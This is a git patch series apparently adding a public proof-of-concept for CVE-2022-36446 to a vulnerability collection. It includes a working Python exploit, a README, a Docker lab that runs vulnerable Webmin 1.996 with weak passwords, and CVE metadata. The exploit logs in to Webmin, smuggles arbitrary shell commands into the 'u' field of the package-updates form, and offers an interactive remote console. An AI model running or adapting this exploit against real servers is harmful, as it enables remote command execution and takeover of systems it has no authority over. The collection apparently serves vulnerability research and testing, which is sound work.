From c00b75e08c587e971d6ba0481608b58465c96118 Mon Sep 17 00:00:00 2001
From: 0CarryT0 <86938839+0CarryT0@users.noreply.github.com>
Date: Wed, 29 Mar 2023 19:52:35 +0800
Subject: [PATCH 1/2] add CVE-2022-36446

---
 .../2022/CVE-2022-36446/CVE-2022-36446.py     | 158 ++++++++++++++++++
 cve/webmin/2022/CVE-2022-36446/README.md      |  59 +++++++
 .../2022/CVE-2022-36446/test_env/Dockerfile   |  23 +++
 .../2022/CVE-2022-36446/test_env/Makefile     |  21 +++
 cve/webmin/2022/yaml/CVE-2022-36446.yaml      |  20 +++
 5 files changed, 281 insertions(+)
 create mode 100644 cve/webmin/2022/CVE-2022-36446/CVE-2022-36446.py
 create mode 100644 cve/webmin/2022/CVE-2022-36446/README.md
 create mode 100644 cve/webmin/2022/CVE-2022-36446/test_env/Dockerfile
 create mode 100644 cve/webmin/2022/CVE-2022-36446/test_env/Makefile
 create mode 100644 cve/webmin/2022/yaml/CVE-2022-36446.yaml

diff --git a/cve/webmin/2022/CVE-2022-36446/CVE-2022-36446.py b/cve/webmin/2022/CVE-2022-36446/CVE-2022-36446.py
new file mode 100644
index 00000000..cf735bbc
--- /dev/null
+++ b/cve/webmin/2022/CVE-2022-36446/CVE-2022-36446.py
@@ -0,0 +1,158 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# File name          : CVE-2022-36446.py
+# Author             : Podalirius (@podalirius_)
+# Date created       : 11 Aug 2022
+
+import argparse
+import binascii
+import html
+import requests
+import os
+from bs4 import BeautifulSoup
+
+
+VERSION = "1.1"
+
+
+def parseArgs():
+    print("CVE-2022-36446 - Webmin < 1.997 - Software Package Updates RCE (Authenticated) v%s - by @podalirius_\n" % VERSION)
+
+    parser = argparse.ArgumentParser(description="CVE-2022-36446 - Webmin < 1.997 - Software Package Updates RCE (Authenticated)")
+    parser.add_argument("-t", "--target", default=None, required=True, help="URL to the webmin instance")
+    parser.add_argument("-k", "--insecure", default=False, action="store_true", help="")
+
+    parser.add_argument("-u", "--username", default=None, required=True, help="Username to connect to the webmin.")
+    parser.add_argument("-p", "--password", default=None, required=True, help="Password to connect to the webmin.")
+
+    mode = parser.add_mutually_exclusive_group(required=True)
+    mode.add_argument("-I", "--interactive", default=False, action="store_true", help="Interactive console mode.")
+    mode.add_argument("-C", "--command", default=None, help="Only execute the specified command.")
+
+    parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode. (default: False)")
+
+    return parser.parse_args()
+
+
+def webmin_login(username, password, target, verify=True):
+    session = requests.Session()
+
+    try:
+        r = session.post(
+            target + "/session_login.cgi",
+            verify=verify,
+            data={
+                "user": username,
+                "pass": password
+            },
+            cookies={
+                "testing": "1"
+            }
+        )
+
+        r = session.post(
+            target + "/sysinfo.cgi",
+            verify=verify,
+        )
+    except Exception as e:
+        print("[error] %s" % e)
+        return None
+
+    soup = BeautifulSoup(r.content, 'lxml')
+    html_tag = soup.find('html')
+    if "data-user" in html_tag.attrs.keys():
+        print("[+] Successful login as '%s' to webmin." % html_tag["data-user"])
+        return session
+    else:
+        return None
+
+
+def can_access_software_updates(session, target):
+    r = session.get(target + "/package-updates")
+    soup = BeautifulSoup(r.content, 'lxml')
+    html_tag = soup.find('html')
+    if "data-module" in html_tag.attrs.keys():
+        return True
+    else:
+        return False
+
+
+def CVE_2022_36446_exec(session, target, cmd):
+    random_tag = binascii.hexlify(os.urandom(16)).decode('utf-8')
+    random_tag_h, random_tag_l = random_tag[:16], random_tag[16:]
+
+    session.headers.update({
+        "Referer": "%s/package-updates/update.cgi?xnavigation=1" % target
+    })
+    r = session.post(
+        target + "/package-updates/update.cgi",
+        data={
+            "mode": "new",
+            "search": "ssh",
+            "redir": "",
+            "redirdesc": "",
+            "u": "0;echo '%s''%s'; %s; echo '%s''%s'" % (random_tag_h, random_tag_l, cmd, random_tag_h, random_tag_l),
+            "confirm": "Install+Now"
+        }
+    )
+    # Getting command output
+    splited_tags = r.content.decode('utf-8').split(random_tag)
+    result = ""
+    if len(splited_tags) >= 3:
+        result = splited_tags[1].strip()
+        result = html.unescape(result)
+        return result
+
+
+if __name__ == '__main__':
+    options = parseArgs()
+
+    options.target = options.target.rstrip("/")
+    if not options.target.startswith("http://") and not options.target.startswith("https://"):
+        options.target = "https://" + options.target
+
+    if options.insecure:
+        # Disable warnings of insecure connection for invalid certificates
+        requests.packages.urllib3.disable_warnings()
+        # Allow use of deprecated and weak cipher methods
+        requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"
+        try:
+            requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"
+        except AttributeError:
+            pass
+
+    session = webmin_login(
+        username=options.username,
+        password=options.password,
+        target=options.target,
+        verify=not(options.insecure)
+    )
+
+    if session is not None:
+        if can_access_software_updates(session, options.target):
+            print("[+] User can access Software updates")
+            if options.interactive:
+                # Interactive console
+                while options.interactive:
+                    cmd = input("$ ")
+                    if cmd.strip() != "exit":
+                        result = CVE_2022_36446_exec(
+                            session=session,
+                            target=options.target,
+                            cmd=cmd
+                        )
+                        print(result)
+                    else:
+                        options.interactive = False
+            else:
+                # Single command
+                if options.command is not None:
+                    result = CVE_2022_36446_exec(
+                        session=session,
+                        target=options.target,
+                        cmd=options.command
+                    )
+                    print(result)
+
+    else:
+        print("[!] Could not login to webmin.")
diff --git a/cve/webmin/2022/CVE-2022-36446/README.md b/cve/webmin/2022/CVE-2022-36446/README.md
new file mode 100644
index 00000000..9e5fff86
--- /dev/null
+++ b/cve/webmin/2022/CVE-2022-36446/README.md
@@ -0,0 +1,59 @@
+![](./.github/banner.png)
+
+<p align="center">
+  A Python script to exploit CVE-2022-36446 Software Package Updates RCE (Authenticated) on Webmin < 1.997.
+  <br>
+  <img alt="GitHub release (latest by date)" src="https://img.shields.io/github/v/release/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE">
+  <a href="https://twitter.com/intent/follow?screen_name=podalirius_" title="Follow"><img src="https://img.shields.io/twitter/follow/podalirius_?label=Podalirius&style=social"></a>
+  <a href="https://www.youtube.com/c/Podalirius_?sub_confirmation=1" title="Subscribe"><img alt="YouTube Channel Subscribers" src="https://img.shields.io/youtube/channel/subscribers/UCF_x5O7CSfr82AfNVTKOv_A?style=social"></a>
+  <br>
+</p>
+
+
+## Features
+
+ - [x] Supports HTTP and HTTPS (even with self-signed certificates with `--insecure`).
+ - [x] Single command execution with `--command` option.
+ - [x] Interactive console with `--interactive` option.
+
+## Usage
+
+```
+$ ./CVE-2022-36446.py -h
+CVE-2022-36446 - Webmin < 1.997 - Software Package Updates RCE (Authenticated) v1.1 - by @podalirius_
+
+usage: CVE-2022-36446.py [-h] -t TARGET [-k] -u USERNAME -p PASSWORD (-I | -C COMMAND) [-v]
+
+CVE-2022-36446 - Webmin < 1.997 - Software Package Updates RCE (Authenticated)
+
+optional arguments:
+  -h, --help            show this help message and exit
+  -t TARGET, --target TARGET
+                        URL to the webmin instance
+  -k, --insecure
+  -u USERNAME, --username USERNAME
+                        Username to connect to the webmin.
+  -p PASSWORD, --password PASSWORD
+                        Password to connect to the webmin.
+  -I, --interactive     Interactive console mode.
+  -C COMMAND, --command COMMAND
+                        Only execute the specified command.
+  -v, --verbose         Verbose mode. (default: False)
+```
+
+## Mitigation
+
+Update to Webmin >= 1.997.
+
+## Demonstration
+
+https://user-images.githubusercontent.com/79218792/184222596-3878e169-92ec-4507-99b5-3fe2c1d39360.mp4
+
+## Contributing
+
+Pull requests are welcome. Feel free to open an issue if you want to add other features.
+
+## References
+ - Vulnerable version: https://github.com/webmin/webmin/releases/download/1.996/webmin_1.996_all.deb
+ - https://github.com/webmin/webmin/commit/13f7bf9621a82d93f1e9dbd838d1e22020221bde
+
diff --git a/cve/webmin/2022/CVE-2022-36446/test_env/Dockerfile b/cve/webmin/2022/CVE-2022-36446/test_env/Dockerfile
new file mode 100644
index 00000000..6c09694b
--- /dev/null
+++ b/cve/webmin/2022/CVE-2022-36446/test_env/Dockerfile
@@ -0,0 +1,23 @@
+FROM debian:buster
+
+RUN apt-get -y -q update \
+    && apt-get -y -q install wget tar git libnet-ssleay-perl libauthen-pam-perl libio-pty-perl unzip shared-mime-info
+
+RUN mkdir -p /webmin/ \
+    && wget https://github.com/webmin/webmin/releases/download/1.996/webmin_1.996_all.deb -O /webmin/webmin.deb \
+    && dpkg -i /webmin/webmin.deb
+
+RUN useradd -s /bin/bash webmin \
+    && echo "webmin:webmin" | chpasswd \
+    && echo "root:root" | chpasswd
+
+RUN echo "#!/bin/bash" > /entrypoint.sh \
+    && echo "cd /usr/share/webmin" >> /entrypoint.sh \
+    && echo "./webmin-init start" >> /entrypoint.sh \
+    && echo "./webmin-init status" >> /entrypoint.sh \
+    && echo "tail -f /var/webmin/miniserv.error" >> /entrypoint.sh \
+    && chmod +x /entrypoint.sh
+
+EXPOSE 80
+
+CMD /entrypoint.sh
diff --git a/cve/webmin/2022/CVE-2022-36446/test_env/Makefile b/cve/webmin/2022/CVE-2022-36446/test_env/Makefile
new file mode 100644
index 00000000..f578e2ac
--- /dev/null
+++ b/cve/webmin/2022/CVE-2022-36446/test_env/Makefile
@@ -0,0 +1,21 @@
+.PHONY: build img
+
+IMGNAME := awesome_rce_webmin_1_996
+PORT := 10080
+
+all : build
+
+build:
+	docker build -t $(IMGNAME):latest -f Dockerfile .
+
+start: build
+	docker run --rm -it -p $(PORT):10000 $(IMGNAME)
+
+background:
+	docker run --rm -d -p $(PORT):10000 $(IMGNAME)
+
+shell:
+	docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash
+
+stop:
+	docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}')
diff --git a/cve/webmin/2022/yaml/CVE-2022-36446.yaml b/cve/webmin/2022/yaml/CVE-2022-36446.yaml
new file mode 100644
index 00000000..b334557e
--- /dev/null
+++ b/cve/webmin/2022/yaml/CVE-2022-36446.yaml
@@ -0,0 +1,20 @@
+id: CVE-2022-36446
+source: https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE
+info:
+  name: Webmin是用于类Unix系统的基于Web的服务器管理控制面板。
+  severity: CRITICAL
+  description: |
+    1.997之前Webmin中的software/apt-lib.pl缺少UI命令的HTML转义。
+  scope-of-influence:
+    webmin < 1.997
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-36446
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-36446
+    cwe-id: CWE-116
+    cnvd-id: None
+    kve-id: None
+  tags: cve2022, RCE
+  
\ No newline at end of file
-- 
Gitee


From ab0bd0bcd6418e577de3182af94f31d5b59eaeed Mon Sep 17 00:00:00 2001
From: 0CarryT0 <86938839+0CarryT0@users.noreply.github.com>
Date: Wed, 29 Mar 2023 20:06:32 +0800
Subject: [PATCH 2/2] add CVE-2022-36446

---
 openkylin_list.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 9bd0c3cc..ff5ee39a 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -144,6 +144,7 @@ cve:
     - CVE-2022-31692
   webmin:
     - CVE-2022-0824
+    - CVE-2022-36446
   Zimbra:
     - CVE-2022-27925
 cnvd:
-- 
Gitee